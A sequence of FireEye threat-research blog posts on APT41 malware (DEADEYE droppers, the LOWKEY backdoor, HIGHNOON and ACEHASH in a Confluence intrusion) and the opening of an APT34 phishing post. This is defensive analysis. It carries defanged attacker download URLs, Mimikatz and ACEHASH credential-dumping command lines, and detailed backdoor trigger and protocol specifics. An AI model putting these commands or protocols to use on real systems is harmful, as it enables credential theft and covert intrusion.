  • FE_APT_Controller_SH_MESSAGETAP_1
  • FE_APT_Trojan_Linux64_MESSAGETAP_1
  • FE_APT_Trojan_Linux_MESSAGETAP_1   
  • FE_APT_Trojan_Linux_MESSAGETAP_2    
  • FE_APT_Trojan_Linux_MESSAGETAP_3

Example File

  • File name: mtlserver
  • MD5 hash: 8D3B3D5B68A1D08485773D70C186D877

*This sample was identified by FireEye on VirusTotal and provides an example for readers to reference. The file is a less robust version than instances of MESSAGETAP identified in intrusions and may represent an earlier test of the malware. The file and any of its embedded data were not observed in any Mandiant Consulting engagement*



Thank you to Adrian Pisarczyk, Matias Bevilacqua and Marcin Siedlarz for identification and analysis of MESSAGETAP at a FireEye Mandiant Consulting engagement.

LOWKEY: Hunting for the Missing Volume Serial ID

In August 2019, FireEye released the “Double Dragon” report on our newest graduated threat group: APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services.

This blog post is about the sophisticated passive backdoor we track as LOWKEY, mentioned in the APT41 report and recently unveiled at the FireEye Cyber Defense Summit. We observed LOWKEY being used in highly targeted attacks, utilizing payloads that run only on specific systems. Additional malware family names are used in the blog post and briefly described. For a complete overview of malware used by APT41 please refer to the Technical Annex section of our APT41 report.

The blog post is split into three parts, which are shown in Figure 1. The first describes how we managed to analyze the encrypted payloads. The second part features position independent loaders we observed in multiple samples, adding an additional layer of obfuscation. The final part is about the actual backdoor we call LOWKEY, which comes in two variants, a passive TCP listener and a passive HTTP listener targeting Internet Information Services (IIS).

Figure 1: Blog post overview


Tracking APT41 activities over the past months, we observed multiple samples that shared two unique features: the use of RC5 encryption which we don’t encounter often, and a unique string “f@Ukd!rCto R$.”. We track these samples as DEADEYE.

DEADEYE comes in multiple variants:

  • DEADEYE.DOWN has the capability to download additional payloads.
  • DEADEYE.APPEND has additional payloads appended to it.
  • DEADEYE.EXT loads payloads that are already present on the system.


A sample belonging to DEADEYE.DOWN (MD5: 5322816c2567198ad3dfc53d99567d6e) attempts to download two files on the first execution of the malware.

The first file is downloaded from hxxp://checkin.travelsanignacio[.]com/static/20170730.jpg. The command and control (C2) server response is first RC5 decrypted with the key “wsprintfA” and then RC5 encrypted with a different key and written to disk as <MODULE_NAME>.mui.

The RC5 key is constructed using the volume serial number of the C drive. The volume serial number is a 4-byte value, usually based on the install time of the system. The volume serial number is XORed with the hard-coded constant “f@Ukd!rCto R$.” and then converted to hex to derive a key of up to 28 bytes in length. The key length can vary if the XORed value contains an embedded zero byte because the lstrlenA API call is used to determine the length of it. Note that the lstrlenA API call happens before the result is converted to hex. If the index of the byte modulo 4 is zero, the hex conversion is in uppercase. The key derivation is illustrated in Table 1.

Volume Serial number of C drive, for example 0xAABBCCDD

F          ^          0xAA

=          0xCC


@         ^          0xBB

=          0xFB


U          ^          0xCC

=          0x99


k          ^          0xDD

=          0xB6


d          ^          0xAA

=          0xCE


!           ^          0xBB

=          0x9A


r           ^          0xCC

=          0xBE


C          ^          0xDD

=          0x9E


t           ^          0xAA

=          0xDE


o          ^          0xBB

=          0xD4


(0x20)   ^          0xCC

=          0xEC


R          ^          0xDD

=          0x8F


$          ^          0xAA

=          0x8E


.           ^          0xBB

=          0x95


Derived key CCfb99b6CE9abe9eDEd4ec8f8E95

Table 1: Key derivation example

The second file is downloaded from hxxp://checkin.travelsanignacio[.]com/static/20160204.jpg. The C2 response is RC5 decrypted with the key “wsprintfA” and then XORed with 0x74, before it is saved as C:\Windows\System32\wcnapi.mui.

Figure 2: 5322816c2567198ad3dfc53d99567d6e download

The sample then determines its own module name, appends the extension mui to it and attempts to decrypt the file using RC5 encryption. This effectively decrypts the file the malware just downloaded and stored encrypted on the system previously. As the file has been encrypted with a key based on the volume serial number it can only be executed on the system it was downloaded on or a system that has the same volume serial number, which would be a remarkable coincidence.

An example mui file is the MD5 hash e58d4072c56a5dd3cc5cf768b8f37e5e. Looking at the encrypted file in a hex editor reveals a high entropy (7.999779/8). RC5 uses Electronic Code Book (ECB) mode by default. ECB means that each code block (64 bit) is encrypted independent from other code blocks. This means the same plaintext block always results in the same cipher text, independent from its position in the binary. The file has 792933 bytes in total but almost no duplicate cipher blocks, which means the data likely has an additional layer of encryption.

Without the correct volume serial number nor any knowledge about the plaintext there is no efficient way to decrypt the payload e58d4072c56a5dd3cc5cf768b8f37e5e with just the knowledge of the current sample.


Fortunately searching for the unique string “f@Ukd!rCto R$.“ in combination with artifacts from RC5 reveals additional samples. One of the related samples is DEADEYE.APPEND (MD5: 37e100dd8b2ad8b301b130c2bca3f1ea), which has been previously analyzed by Kaspersky ( This sample is different because it is protected with VMProtect and has the obfuscated binary appended to it. The embedded binary starts at offset 3287552 which can be seen in Figure 3 with the differing File Size and PE Size.

Figure 3: A look at the PE header reveals a larger file size than PE size

The encrypted payload has a slightly lower entropy of 7.990713 out of 8. Looking at the embedded binary in a hex editor reveals multiple occurrences of the byte pattern 51 36 94 A4 26 5B 0F 19, as seen in Figure 4. As this pattern occurs multiple times in a row in the middle of the encrypted data and ECB mode is being used, an educated guess is that the plaintext is supposed to be 00 00 00 00 00 00 00 00.

Figure 4: Repeating byte pattern in 37e100dd8b2ad8b301b130c2bca3f1ea

RC5 Brute Forcer

With this knowledge we decided to take a reference implementation of RC5 and add a main function that accounts for the key derivation algorithm used by the malware samples (see Figure 5). Brute forcing is possible as the key is derived from a single DWORD; even though the final key length might be 28 bytes, there are only 4294967296 possible keys. The code shown in Figure 5 generates all possible volume serial numbers, derives the key from them and tries to decrypt 51 36 94 A4 26 5B 0F 19 to 00 00 00 00 00 00 00 00. Running the RC5 brute forcer for a couple of minutes shows the correct volume serial number for the sample, which is 0xc25cff4c.

Note if you want to run the brute forcer yourself
The number of DWORDs of the key in the reference implementation we used is represented by the global c, and we had to change it to 7 to match the malware’s key length of 28 bytes. There were some issues with the conversion because in the malware a zero byte within the generated key ultimately leads to a shorter key length. The implementation we used uses a hard-coded key length (c), so we generated multiple executables with c = 6, c = 5, c = 4… as these usually only ran for a couple of minutes to cover the entire key space. All the samples mentioned in the Appendix 1 could be solved with c = 7 or c = 6.

Figure 5: Main function RC5 brute forcer

The decrypted payload belongs to the malware family POISONPLUG (MD5: 84b69b5d14ba5c5c9258370c9505438f). POISONPLUG is a highly obfuscated modular backdoor with plug-in capabilities. The malware is capable of registry or service persistence, self-removal, plug-in execution, and network connection forwarding. POISONPLUG has been observed using social platforms to host encoded command and control commands.

We confirmed the findings from Kaspersky and additionally found a second command and control URL hxxps://steamcommunity[.]com/id/oswal053, as mentioned in our APT 41 report.

Taking everything into account that we learned from DEADEYE.APPEND (MD5: 37e100dd8b2ad8b301b130c2bca3f1ea), we decided to take another look at the encrypted mui file (e58d4072c56a5dd3cc5cf768b8f37e5e). Attempts to brute force the first bytes to match with the ones of the decrypted POISONPLUG payload did not yield any results.

Fortunately, we found additional samples that use the same encryption scheme. In one of the samples the malware authors included two checks to validate the decrypted payload. The expected plaintext at the specified offsets for DEADEYE.APPEND (MD5: 7f05d410dc0d1b0e7a3fcc6cdda7a2ff) is shown in Table 2.


Expected byte after decryption









Table 2: Byte comparisons after decrypting in DEADEYE.APPEND (MD5: 7f05d410dc0d1b0e7a3fcc6cdda7a2ff)

Applying these constraints to our brute forcer and trying to decrypt mui file (e58d4072c56a5dd3cc5cf768b8f37e5e) once more resulted in a low number of successful hits which we could then manually check. The correct volume serial number for the encrypted mui is 0x243e2562. Analysis determined the decrypted file is XMRig miner. This also explains why the dropper downloads two files. The first, <MODULE_NAME>.mui is the crypto miner, and the second C:\Windows\System32\wcnapi.mui, is the configuration. The decrypted mui contains another layer of obfuscation and is eventually executed with the command x -c wcnapi.mui. An explanation on how the command was obtained and the additional layer of obfuscation is given in the next part of the blog post.

For a list of samples with the corresponding volume serial numbers, please refer to Appendix 1.

Additional RC4 Layer

An additional RC4 layer has been identified in droppers used by APT41, which we internally track as DEADEYE. The layer has been previously detailed in a blog post by ESET. We wanted to provide some additional information on this, as it was used in some of the samples we managed to brute force.

The additional layer is position independent shellcode containing a reflective DLL loader. The loader decrypts an RC4 encrypted payload and loads it in memory. The code itself is a straight forward loader with the exception of some interesting artifacts identified during analysis.

As mentioned in the blog post by ESET, the encrypted payload is prepended with a header. It contains the RC4 encryption key and two fields of variable length, which have previously been identified as file names. These two fields are encrypted with the same RC4 encryption key that is also used to decrypt the payload. The header is shown in Table 3.

Header bytes


0 15

RC4 key XOR encoded with 0x37

16 19

Size of loader stub before the header

20 23

RC4 key size

24 27

Command ASCII size (CAS)

28 31

Command UNICODE size (CUS)

32 35

Size of encrypted payload

36 39

Launch type

40 (40 + CAS)

Command ASCII

(40 + CAS) (40 + CAS + CUS)


(40 + CAS + CUS) (40 + CAS + CUS + size of encrypted payload)

Encrypted payload

Table 3: RC4 header overview

Looking at the payloads hidden behind the RC5 layer, we observed, that these fields are not limited to file names, instead they can also contain commands used by the reflective loader. If no command is specified, the default parameter is the file name of the loaded payload. In some instances, this revealed the full file path and file name in the development environment. Table 4 shows some paths and file names. This is also how we found the command (x -c wcnapi.mui) used to launch the decrypted mui file from the first part of the blog post.

MD5 hash

Arguments found in the RC4 layer

















Table 4: Decrypted paths and file names


The final part of the blog post describes the capabilities of the passive backdoor LOWKEY (MD5: 8aab5e2834feb68bb645e0bad4fa10bd) decrypted from DEADEYE.APPEND (MD5: 7f05d410dc0d1b0e7a3fcc6cdda7a2ff). LOWKEY is a passive backdoor that supports commands for a reverse shell, uploading and downloading files, listing and killing processes and file management. We have identified two variants of the LOWKEY backdoor.

The first is a TCP variant that listens on port 53, and the second is an HTTP variant that listens on TCP port 80. The HTTP variant intercepts URL requests matching the UrlPrefix http://+:80/requested.html. The + in the given UrlPrefix means that it will match any host name. It has been briefly mentioned by Kaspersky as “unknown backdoor”.

Both variants are loaded by the reflective loader described in the previous part of the blog post. This means we were able to extract the original file names. They contain meaningful names and provide a first hint on how the backdoor operates.

HTTP variant (MD5: c11dd805de683822bf4922aecb9bfef5)

TCP variant (MD5: 7f05d410dc0d1b0e7a3fcc6cdda7a2ff)

The interesting parts are shown in Figure 6. PortReuse describes the general idea behind the backdoor, to operate on a well-known port. The paths also contain version numbers 2.5 and v1.3-53. IIS_Share is used for the HTTP variant and describes the targeted application, DeviceIOContrl-Hook is used for the TCP variant.

Figure 6: Overview important parts of executable path

Both LOWKEY variants are functionally identical with one exception. The TCP variant relies on a second component, a user mode rootkit that is capable of intercepting incoming TCP connections. The internal name used by the developers for that component is E:\code\PortReuse\3389-share\DeviceIOContrl-Hook\v1.3-53\NetAgent\x64\Release\NetAgent.exe.

Figure 7: LOWKEY components


Inner-Loader.dll is a watch guard for the LOWKEY backdoor. It leverages the GetExtendedTcpTable API to retrieve all processes with an open TCP connection. If a process is listening on TCP port 53 it injects NetAgent.exe into the process. This is done in a loop with a 10 second delay. The loader exits the loop when NetAgent.exe has been successfully injected. After the injection it will create a new thread for the LOWKEY backdoor (SK3.x.exe).

The watch guard enters an endless loop that executes every 20 minutes and ensures that the NetAgent.exe and the LOWKEY backdoor are still active. If this is not the case it will relaunch the backdoor or reinject the NetAgent.exe.


NetAgent.exe is a user mode rootkit that provides covert communication with the LOWKEY backdoor component. It forwards incoming packets, after receiving the byte sequence FF FF 01 00 00 01 00 00 00 00 00 00, to the named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00001-00001}.

The component works by hooking the NtDeviceIoControlFile API. It does that by allocating a suspiciously large region of memory, which is used as a global hook table. The table consists of 0x668A0 bytes and has read, write and execute permissions set.

Each hook table entry consists of 3 pointers. The first points to memory containing the original 11 bytes of each hooked function, the second entry contains a pointer to the remaining original instructions and the third pointer points to the function hook. The malware will only hook one function in this manner and therefore allocates an unnecessary large amount of memory. The malware was designed to hook up to 10000 functions this way.

The hook function begins by iterating the global hook table and compares the pointer to the hook function to itself. This is done to find the original instructions for the installed hook, in this case NtDeviceIoControlFile. The malware then executes the saved instructions which results in a regular NtDeviceIoControlFile API call. Afterwards the IoControlCode is compared to 0x12017 (AFD_RECV).

If the IoControlCode does not match, the original API call results are returned.

If they match the malware compares the first 12 bytes of the incoming data. As it is effectively a TCP packet, it is parsing the TCP header to get the data of the packet. The first 12 bytes of the data section are compared against the hard-coded byte pattern: FF FF 01 00 00 01 00 00 00 00 00 00.

If they match it expects to receive additional data, which seems to be unused, and then responds with a 16 byte header 00 00 00 00 00 91 03 00 00 00 00 00 80 1F 00 00, which seems to be hard-coded and to indicate that following packets will be forwarded to the named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00001-00001}. The backdoor component (SK3.x.exe) receives and sends data to the named pipe. The hook function will forward all received data from the named pipe back to the socket, effectively allowing a covert communication between the named pipe and the socket.


SK3.x.exe is the actual backdoor component. It supports writing and reading files, modification of file properties, an interactive command shell, TCP relay functionality and listing running processes. The backdoor opens a named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00001-00001} for communication.

Data received by the backdoor is encrypted with RC4 using the key “CreateThread“ and then XORed with 0x77. All data sent by the backdoor uses the same encryption in reverse order (first XOR with 0x77, then RC4 encrypted with the key “CreateThread“). Encrypted data is preceded by a 16-byte header which is unencrypted containing an identifier and the size of the following encrypted packet.

An example header looks as follows:
00 00 00 00 00 FD 00 00 10 00 00 00 00 00 00 00



00 00 00 00 00


FD 00

Bytes 5 and 6 are the command identifier, for a list of all supported identifiers check Table 6 and Table 7.



10 00 00 00

Size of the encrypted packet that is send after the header

00 00 00 00


Table 5: Subcomponents of header

The backdoor supports the commands listed in tables Table 6 and Table 7. Most commands expect a string at the beginning which likely describes the command and is for the convenience of the operators, but this string isn't actively used by the malware and could be anything. For example, KILL <PID> could also be A <PID>. Some of the commands rely on two payloads (UserFunction.dll and ProcTran.dll), that are embedded in the backdoor and are either injected into another process or launch another process.


Userfunction.dll starts a hidden cmd.exe process, creates the named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00000-00000} and forwards all received data from the pipe to the standard input of the cmd.exe process. All output from the process is redirected back to the named pipe. This allows interaction with the shell over the named pipe.


The component opens a TCP connection to the provided host and port, creates the named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00000-00001} and forwards all received data from the pipe to the opened TCP connection. All received packets on the connection are forwarded to the named pipe. This allows interaction with the TCP connection over the named pipe.





<cmd> <arg1> <arg2>

Provides a simple shell, that supports the following commands, dir, copy, move, del, systeminfo and cd. These match the functionality of standard commands from a shell. This is the only case where the <cmd> is actually used.


<cmd> <arg1>

The argument is interpreted as a process id (PID). The backdoor injects UserFunction.dll into the process, which is an interactive shell that forwards all input and output data to Microsoft Ole Object {30000-7100-12985-00000-00000}. The backdoor will then forward incoming data to the named pipe allowing for communication with the opened shell. If no PID is provided, the `cmd.exe` is launched as child process of the backdoor process with input and output redirected to the named pipe Microsoft Ole Object {30000-7100-12985-00001-00001}


<cmd> <arg1> <arg2>

Writes data to a file. The first argument is the <file_name>, the second argument is an offset into the file


<cmd> <arg1> <arg2>

Reads data from a file. The first argument is the <file_name>, the second argument is an offset into the file, the third argument is optional, and the exact purpose is unknown



Lists running processes, including the process name, PID, process owner and the executable path


<cmd> <arg1>

Kills the process with the provided process id (PID)


<cmd> <arg1> <arg2>

Copies the files CreationTime, LastAccessTime and LastWriteTime from the second argument and applies them to the first argument. Both arguments are expected to be full file paths. The order of the arguments is a bit unusual, as one would usually apply the access times from the second argument to the third



List running processes with additional details like the SessonId and the CommandLine by executing the WMI query SELECT Name,ProcessId,SessionId,CommandLine,ExecutablePath FROM Win32_Process



Ping command, the malware responds with the following byte sequence 00 00 00 00 00 65 00 00 00 00 00 00 06 00 00 00. Experiments with the backdoor revealed that the identifier 0x65 seems to indicate a successful operation, whereas 0x66 indicates an error.

Table 6: C2 commands

The commands listed in Table 7 are used to provide functionality of a TCP traffic relay. This allows operators to communicate through the backdoor with another host via TCP. This could be used for lateral movement in a network. For example, one instance of the backdoor could be used as a jump host and additional hosts in the target network could be reached via the TCP traffic relay. Note that the commands 0xD2, 0xD3 and 0xD6 listed in Table 7 can be used in the main backdoor thread, without having to use the ProcTran.dll.





<cmd> <arg1>

The argument is interpreted as a process id (PID). The backdoor injects ProcTran.dll into the process, which is a TCP traffic relay component that forwards all input and output data to Microsoft Ole Object {30000-7100-12985-00000-00001}. The commands 0xD2, 0xD3 and 0xD6 can then be used with the component.


<arg1> <arg2>

Opens a connection to the provided host and port, the first argument is the host, the second the port. On success a header with the identifier set to 0xD4 is returned (00 00 00 00 00 D4 00 00 00 00 00 00 00 00 00 00). This effectively establishes a TCP traffic relay allowing operators to communicate with another system through the backdoored machine.



Receives and sends data over the connection opened by the 0xD2 command. Received data is first RC4 decrypted with the key “CreateThread“ and then single-byte XOR decoded with 0x77. Data sent back is directly relayed without any additional encryption.



Closes the socket connection that had been established by the 0xD2 command



Closes the named pipe Microsoft Ole Object {30000-7100-12985-00000-00001} that is used to communicate with the injected ProcTran.dll. This seems to terminate the thread in the targeted process by the 0x105 command

Table 7: C2 commands TCP relay


The TCP LOWKEY variant passively listens for the byte sequence FF FF 01 00 00 01 00 00 00 00 00 00 on TCP port 53 to be activated. The backdoor then uses up to three named pipes for communication. One pipe is used for the main communication of the backdoor, the other ones are used on demand for the embedded payloads.

  • \\.\pipe\Microsoft Ole Object {30000-7100-12985-00001-00001} main communication pipe
  • \\.\pipe\Microsoft Ole Object {30000-7100-12985-00000-00001} named pipe used for interaction with the TCP relay module ProcTran.dll
  • \\.\pipe\Microsoft Ole Object {30000-7100-12985-00000-00000} named pipe used for the interactive shell module UserFunction.dll

Figure 8 summarizes how the LOWKEY components interact with each other.

Figure 8: LOWKEY passive backdoor overview



Correct Volume Serial

Dropper Family

Final Payload Family



























































None - encrypted data


















Appendix 1: List of samples with RC5 encrypted payloads

GAME OVER: Detecting and Stopping an APT41 Operation

In August 2019, FireEye released the “Double Dragon” report on our newest graduated threat group, APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services. APT41 is known to adapt quickly to changes and detections within victim environments, often recompiling malware within hours of incident responder activity. In multiple situations, we also identified APT41 utilizing recently-disclosed vulnerabilities, often weaponzing and exploiting within a matter of days.

Our knowledge of this group’s targets and activities are rooted in our Incident Response and Managed Defense services, where we encounter actors like APT41 on a regular basis. At each encounter, FireEye works to reverse malware, collect intelligence and hone our detection capabilities. This ultimately feeds back into our Managed Defense and Incident Response teams detecting and stopping threat actors earlier in their campaigns.

In this blog post, we’re going to examine a recent instance where FireEye Managed Defense came toe-to-toe with APT41. Our goal is to display not only how dynamic this group can be, but also how the various teams within FireEye worked to thwart attacks within hours of detection – protecting our clients’ networks and limiting the threat actor’s ability to gain a foothold and/or prevent data exposure.


In April 2019, FireEye’s Managed Defense team identified suspicious activity on a publicly-accessible web server at a U.S.-based research university. This activity, a snippet of which is provided in Figure 1, indicated that the attackers were exploiting CVE-2019-3396, a vulnerability in Atlassian Confluence Server that allowed for path traversal and remote code execution.

Figure 1: Snippet of PCAP showing attacker attempting CVE-2019-3396 vulnerability

This vulnerability relies on the following actions by the attacker:

  • Customizing the _template field to utilize a template that allowed for command execution.
  • Inserting a cmd field that provided the command to be executed.

Through custom JSON POST requests, the attackers were able to run commands and force the vulnerable system to download an additional file. Figure 2 provides a list of the JSON data sent by the attacker.

Figure 2: Snippet of HTTP POST requests exploiting CVE-2019-3396

As shown in Figure 2, the attacker utilized a template located at hxxps[:]//github[.]com/Yt1g3r/CVE-2019-3396_EXP/blob/master/cmd.vm. This publicly-available template provided a vehicle for the attacker to issue arbitrary commands against the vulnerable system. Figure 3 provides the code of the file cmd.vm.

Figure 3: Code of cmd.vm, used by the attackers to execute code on a vulnerable Confluence system

The HTTP POST requests in Figure 2, which originated from the IP address 67.229.97[.]229, performed system reconnaissance and utilized Windows certutil.exe to download a file located at hxxp[:]//67.229.97[.]229/pass_sqzr.jsp and save it as test.jsp (MD5: 84d6e4ba1f4268e50810dacc7bbc3935). The file test.jsp was ultimately identified to be a variant of a China Chopper webshell.

A Passive Aggressive Operation

Shortly after placing test.jsp on the vulnerable system, the attackers downloaded two additional files onto the system:

  • 64.dat (MD5: 51e06382a88eb09639e1bc3565b444a6)
  • Ins64.exe (MD5: e42555b218248d1a2ba92c1532ef6786)

Both files were hosted at the same IP address utilized by the attacker, 67[.]229[.]97[.]229. The file Ins64.exe was used to deploy the HIGHNOON backdoor on the system. HIGHNOON is a backdoor that consists of multiple components, including a loader, dynamic-link library (DLL), and a rootkit. When loaded, the DLL may deploy one of two embedded drivers to conceal network traffic and communicate with its command and control server to download and launch memory-resident DLL plugins. This particular variant of HIGHNOON is tracked as HIGHNOON.PASSIVE by FireEye. (An exploration of passive backdoors and more analysis of the HIGHNOON malware family can be found in our full APT41 report).

Within the next 35 minutes, the attackers utilized both the test.jsp web shell and the HIGHNOON backdoor to issue commands to the system. As China Chopper relies on HTTP requests, attacker traffic to and from this web shell was easily observed via network monitoring. The attacker utilized China Chopper to perform the following:

  • Movement of 64.dat and Ins64.exe to C:\Program Files\Atlassian\Confluence
  • Performing a directory listing of C:\Program Files\Atlassian\Confluence
  • Performing a directory listing of C:\Users

Additionally, FireEye’s FLARE team reverse engineered the custom protocol utilized by the HIGHNOON backdoor, allowing us to decode the attacker’s traffic. Figure 4 provides a list of the various commands issued by the attacker utilizing HIGHNOON.

Figure 4: Decoded HIGHNOON commands issued by the attacker

Playing Their ACEHASH Card

As shown in Figure 4, the attacker utilized the HIGHNOON backdoor to execute a PowerShell command that downloaded a script from PowerSploit, a well-known PowerShell Post-Exploitation Framework. At the time of this blog post, the script was no longer available for downloading. The commands provided to the script – “privilege::debug sekurlsa::logonpasswords exit exit” – indicate that the unrecovered script was likely a copy of Invoke-Mimikatz, reflectively loading Mimikatz 2.0 in-memory. Per the observed HIGHNOON output, this command failed.

After performing some additional reconnaissance, the attacker utilized HIGHNOON to download two additional files into the C:\Program Files\Atlassian\Confluence directory:

  • c64.exe (MD5: 846cdb921841ac671c86350d494abf9c)
  • (MD5: a919b4454679ef60b39c82bd686ed141)

These two files are the dropper and encrypted/compressed payload components, respectively, of a malware family known as ACEHASH. ACEHASH is a credential theft and password dumping utility that combines the functionality of multiple tools such as Mimikatz, hashdump, and Windows Credential Editor (WCE).

Upon placing c64.exe and on the system, the attacker ran the command

c64.exe "9839D7F1A0 -m”

This specific command provided a password of “9839D7F1A0” to decrypt the contents of, and a switch of “-m”, indicating the attacker wanted to replicate the functionality of Mimikatz. With the correct password provided, c64.exe loaded the decrypted and decompressed shellcode into memory and harvested credentials.

Ultimately, the attacker was able to exploit a vulnerability, execute code, and download custom malware on the vulnerable Confluence system. While Mimikatz failed, via ACEHASH they were able to harvest a single credential from the system. However, as Managed Defense detected this activity rapidly via network signatures, this operation was neutralized before the attackers progressed any further.

Key Takeaways From This Incident

  • APT41 utilized multiple malware families to maintain access into this environment; impactful remediation requires full scoping of an incident.
  • For effective Managed Detection & Response services, having coverage of both Endpoint and Network is critical for detecting and responding to targeted attacks.
  • Attackers may weaponize vulnerabilities quickly after their release, especially if they are present within a targeted environment. Patching of critical vulnerabilities ASAP is crucial to deter active attackers.

Detecting the Techniques

FireEye detects this activity across our platform, including detection for certutil usage, HIGHNOON, and China Chopper.


Signature Name

China Chopper










Certutil Downloader









MD5 Hash (if applicable)















IP Address



Looking for more? Join us for a webcast on August 29, 2019 where we detail more of APT41’s activities. You can also find a direct link to the public APT41 report here.


Special thanks to Dan Perez, Andrew Thompson, Tyler Dean, Raymond Leong, and Willi Ballenthin for identification and reversing of the HIGHNOON.PASSIVE malware.

APT41: A Dual Espionage and Cyber Crime Operation

Today, FireEye Intelligence is releasing a comprehensive report detailing APT41, a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain. Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.

The full published report covers historical and ongoing activity attributed to APT41, the evolution of the group’s tactics, techniques, and procedures (TTPs), information on the individual actors, an overview of their malware toolset, and how these identifiers overlap with other known Chinese espionage operators. APT41 partially coincides with public reporting on groups including BARIUM (Microsoft) and Winnti (Kaspersky, ESET, Clearsky).

Who Does APT41 Target?

Like other Chinese espionage operators, APT41 espionage targeting has generally aligned with China's Five-Year economic development plans. The group has established and maintained strategic access to organizations in the healthcare, high-tech, and telecommunications sectors. APT41 operations against higher education, travel services, and news/media firms provide some indication that the group also tracks individuals and conducts surveillance. For example, the group has repeatedly targeted call record information at telecom companies. In another instance, APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there, suggesting the group was tasked to reconnoiter the facility for security reasons.

The group’s financially motivated activity has primarily focused on the video game industry, where APT41 has manipulated virtual currencies and even attempted to deploy ransomware. The group is adept at moving laterally within targeted networks, including pivoting between Windows and Linux systems, until it can access game production environments. From there, the group steals source code as well as digital certificates which are then used to sign malware. More importantly, APT41 is known to use its access to production environments to inject malicious code into legitimate files which are later distributed to victim organizations. These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns.

Interestingly, despite the significant effort required to execute supply chain compromises and the large number of affected organizations, APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers. These multi-stage operations restrict malware delivery only to intended victims and significantly obfuscate the intended targets. In contrast, a typical spear-phishing campaign’s desired targeting can be discerned based on recipients' email addresses.

A breakdown of industries directly targeted by APT41 over time can be found in Figure 1.


Figure 1: Timeline of industries directly targeted by APT41

Probable Chinese Espionage Contractors

Two identified personas using the monikers “Zhang Xuguang” and “Wolfzhi” linked to APT41 operations have also been identified in Chinese-language forums. These individuals advertised their skills and services and indicated that they could be hired. Zhang listed his online hours as 4:00pm to 6:00am, similar to APT41 operational times against online gaming targets and suggesting that he is moonlighting. Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs.

Attribution to these individuals is backed by identified persona information, their previous work and apparent expertise in programming skills, and their targeting of Chinese market-specific online games. The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group’s later espionage operations.

Figure 2: Operational activity for gaming versus non-gaming-related targeting based on observed operations since 2012

The Right Tool for the Job

APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. The group often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims. Once in a victim organization, APT41 can leverage more sophisticated TTPs and deploy additional malware. For example, in a campaign running almost a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware including backdoors, credential stealers, keyloggers, and rootkits.

APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems. The use of bootkits in particular adds an extra layer of stealth because the code is executed prior to the operating system initializing. The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets.

Fast and Relentless

APT41 quickly identifies and compromises intermediary systems that provide access to otherwise segmented parts of an organization’s network. In one case, the group compromised hundreds of systems across multiple network segments and several geographic regions in as little as two weeks.

The group is also highly agile and persistent, responding quickly to changes in victim environments and incident responder activity. Hours after a victimized organization made changes to thwart APT41, for example, the group compiled a new version of a backdoor using a freshly registered command-and-control domain and compromised several systems across multiple geographic regions. In a different instance, APT41 sent spear-phishing emails to multiple HR employees three days after an intrusion had been remediated and systems were brought back online. Within hours of a user opening a malicious attachment sent by APT41, the group had regained a foothold within the organization's servers across multiple geographic regions.

Looking Ahead

APT41 is a creative, skilled, and well-resourced adversary, as highlighted by the operation’s distinct use of supply chain compromises to target select individuals, consistent signing of malware using compromised digital certificates, and deployment of bootkits (which is rare among Chinese APT groups).

Like other Chinese espionage operators, APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015. This shift, however, has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons. The group's capabilities and targeting have both broadened over time, signaling the potential for additional supply chain compromises affecting a variety of victims in additional verticals.

APT41's links to both underground marketplaces and state-sponsored activity may indicate the group enjoys protections that enables it to conduct its own for-profit activities, or authorities are willing to overlook them. It is also possible that APT41 has simply evaded scrutiny from Chinese authorities. Regardless, these operations underscore a blurred line between state power and crime that lies at the heart of threat ecosystems and is exemplified by APT41.

Hard Pass: Declining APT34’s Invite to Join Their Professional Network


With increasing geopolitical tensions in the Middle East, we expect Iran to significantly increase the volume and scope of its cyber espionage campaigns. Iran has a critical need for strategic intelligence and is likely to fill this gap by conducting espionage against decision makers and key organizations that may have information that furthers Iran's economic and national security goals. The identification of new malware and the creation of additional infrastructure to enable such campaigns highlights the increased tempo of these operations in support of Iranian interests.

FireEye Identifies Phishing Campaign

In late June 2019, FireEye identified a phishing campaign conducted by APT34, an Iranian-nexus threat actor. Three key attributes caught our eye with this particular campaign:

  1. Masquerading as a member of Cambridge University to gain victims’ trust to open malicious documents,
  2. The usage of LinkedIn to deliver malicious documents,
  3. The addition of three new malware families to APT34’s arsenal.

FireEye’s platform successfully thwarted this attempted intrusion, stopping a new malware variant dead in its tracks. Additionally, with the assistance of our FireEye Labs Advanced Reverse Engineering (FLARE), Intelligence, and Advanced Practices teams, we identified three new malware families and a reappearance of PICKPOCKET, malware exclusively observed in use by APT34. The new malware families, which we will examine later in this post, show APT34 relying on their PowerShell development capabilities, as well as trying their hand at Golang.

